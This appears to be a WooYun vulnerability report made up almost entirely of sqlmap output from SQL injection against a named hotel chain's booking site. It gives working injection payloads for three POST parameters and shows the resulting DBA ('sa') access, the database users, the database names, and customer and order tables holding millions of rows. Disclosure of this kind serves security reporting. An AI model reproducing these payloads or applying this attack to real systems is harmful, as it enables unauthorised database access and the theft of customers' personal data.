WooYun.org

http://cp.super8.com.cn/Hotel/HotelList (POST)
stime=2015-09-01&etime=2015-09-
02&roomnum=1&citycode=110100&keycode=228&servercs=&honour=&pageindex=1&sorttype=1&landMrk=&djq=&pagesi
ze=9

sqlmap identified the following injection points with a total of 0 HTTP(s) reque
sts:
---
Place: POST
Parameter: honour
    Type: error-based
    Title: Microsoft SQL Server/Sybase OR error-based - WHERE or HAVING clause
    Payload: stime=2015-09-01&etime=2015-09-02&roomnum=1&citycode=110100&keycode
=228&servercs=&honour=-4628) OR 7763=CONVERT(INT,(SELECT CHAR(113)+CHAR(106)+CHA
R(106)+CHAR(104)+CHAR(113)+(SELECT (CASE WHEN (7763=7763) THEN CHAR(49) ELSE CHA
R(48) END))+CHAR(113)+CHAR(112)+CHAR(112)+CHAR(102)+CHAR(113))) AND (4155=4155&p
ageindex=1&sorttype=1&landMrk=&djq=&pagesize=9
    Type: AND/OR time-based blind
    Title: Microsoft SQL Server/Sybase OR time-based blind (heavy query)
    Payload: stime=2015-09-01&etime=2015-09-02&roomnum=1&citycode=110100&keycode
=228&servercs=&honour=-4048) OR 3047=(SELECT COUNT(*) FROM sysusers AS sys1,sysu
sers AS sys2,sysusers AS sys3,sysusers AS sys4,sysusers AS sys5,sysusers AS sys6
,sysusers AS sys7) AND (8777=8777&pageindex=1&sorttype=1&landMrk=&djq=&pagesize=
9
Place: POST
Parameter: citycode
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: stime=2015-09-01&etime=2015-09-02&roomnum=1&citycode=110100') AND 2
424=2424 AND ('aDZF'='aDZF&keycode=228&servercs=&honour=&pageindex=1&sorttype=1&
landMrk=&djq=&pagesize=9
    Type: error-based
    Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
    Payload: stime=2015-09-01&etime=2015-09-02&roomnum=1&citycode=110100') AND 3
376=CONVERT(INT,(SELECT CHAR(113)+CHAR(106)+CHAR(106)+CHAR(104)+CHAR(113)+(SELEC
T (CASE WHEN (3376=3376) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(112)+C
HAR(112)+CHAR(102)+CHAR(113))) AND ('QfCW'='QfCW&keycode=228&servercs=&honour=&p
ageindex=1&sorttype=1&landMrk=&djq=&pagesize=9
    Type: AND/OR time-based blind
    Title: Microsoft SQL Server/Sybase AND time-based blind (heavy query)
    Payload: stime=2015-09-01&etime=2015-09-02&roomnum=1&citycode=110100') AND 7
647=(SELECT COUNT(*) FROM sysusers AS sys1,sysusers AS sys2,sysusers AS sys3,sys
users AS sys4,sysusers AS sys5,sysusers AS sys6,sysusers AS sys7) AND ('iwOc'='i
wOc&keycode=228&servercs=&honour=&pageindex=1&sorttype=1&landMrk=&djq=&pagesize=
9
Place: POST
Parameter: servercs
    Type: error-based
    Title: Microsoft SQL Server/Sybase OR error-based - WHERE or HAVING clause
    Payload: stime=2015-09-01&etime=2015-09-02&roomnum=1&citycode=110100&keycode
=228&servercs=-6013) OR 1049=CONVERT(INT,(SELECT CHAR(113)+CHAR(106)+CHAR(106)+C
HAR(104)+CHAR(113)+(SELECT (CASE WHEN (1049=1049) THEN CHAR(49) ELSE CHAR(48) EN
D))+CHAR(113)+CHAR(112)+CHAR(112)+CHAR(102)+CHAR(113))) AND (3379=3379&honour=&p
ageindex=1&sorttype=1&landMrk=&djq=&pagesize=9
    Type: AND/OR time-based blind
    Title: Microsoft SQL Server/Sybase OR time-based blind (heavy query)
    Payload: stime=2015-09-01&etime=2015-09-02&roomnum=1&citycode=110100&keycode
=228&servercs=-1418) OR 3789=(SELECT COUNT(*) FROM sysusers AS sys1,sysusers AS
sys2,sysusers AS sys3,sysusers AS sys4,sysusers AS sys5,sysusers AS sys6,sysuser
s AS sys7) AND (5903=5903&honour=&pageindex=1&sorttype=1&landMrk=&djq=&pagesize=
9
---
[01:57:05] [WARNING] changes made by tampering scripts are not included in shown
 payload content(s)
there were multiple injection points, please select the one to use for following
 injections:
[0] place: POST, parameter: citycode, type: Single quoted string (default)
[1] place: POST, parameter: honour, type: Unescaped numeric
[2] place: POST, parameter: servercs, type: Unescaped numeric
[q] Quit
> 0
[02:00:23] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 2008 R2 or 7
web application technology: ASP.NET 4.0.30319, Microsoft IIS 7.5, ASP.NET
back-end DBMS: Microsoft SQL Server 2012
[02:00:23] [INFO] fetching current user
[02:00:23] [INFO] resumed: sa
current user:    'sa'
[02:00:23] [INFO] fetching current database
[02:00:23] [INFO] resumed: crs2
current database:    'crs2'
[02:00:23] [INFO] testing if current user is DBA
current user is DBA:    True
database management system users [17]:
[*] ##MS_AgentSigningCertificate##
[*] ##MS_PolicyEventProcessingLogin##
[*] ##MS_PolicySigningCertificate##
[*] ##MS_PolicyTsqlExecutionLogin##
[*] ##MS_SmoExtendedSigningCertificate##
[*] ##MS_SQLAuthenticatorCertificate##
[*] ##MS_SQLReplicationSigningCertificate##
[*] ##MS_SQLResourceSigningCertificate##
[*] crstemp
[*] NT AUTHORITY\\SYSTEM
[*] NT Service\\MSSQLSERVER
[*] NT SERVICE\\SQLSERVERAGENT
[*] NT SERVICE\\SQLWriter
[*] NT SERVICE\\Winmgmt
[*] PHHXAPP12\\Administrator
[*] sa
[*] super8crs
available databases [20]:
[*] crs2
[*] crs3
[*] crs_all
[*] crs_report
[*] FHS_SRC
[*] ipegasus3
[*] ipegasus3_empty
[*] ipegasus3_test
[*] ipegasus_gresall
[*] ipegasus_history
[*] ipegasus_mirro
[*] ipegasus_test125
[*] master
[*] model
[*] model2
[*] msdb
[*] s8_new
[*] s8_ws
[*] Super8_DW
[*] tempdb
Database: crs2
| dbo.Cu_CustomerInfo                | 5059428 |
| dbo.Cu_AvailableCard               | 5232807 |
| dbo.customertemp                   | 4147436 |
| dbo.Order_GstInfo                  | 1271902 |
| dbo.Order_OptInfo                  | 1175851 |
| dbo.Order_Info                     | 1163925 |
| dbo.Order_StatisticsInfo           | 1163925 |
| dbo.Weixin_Mapping                 | 524954  |
| dbo.Order_Email                    | 196106  |
| dbo.customermobile                 | 139662  |
| dbo.CC_CorpCustomer                | 122552  |
| dbo.Cu_CustomerLog                 | 24126   |
| dbo.PMS_User                       | 942     |
| dbo.UP_User                        | 519     |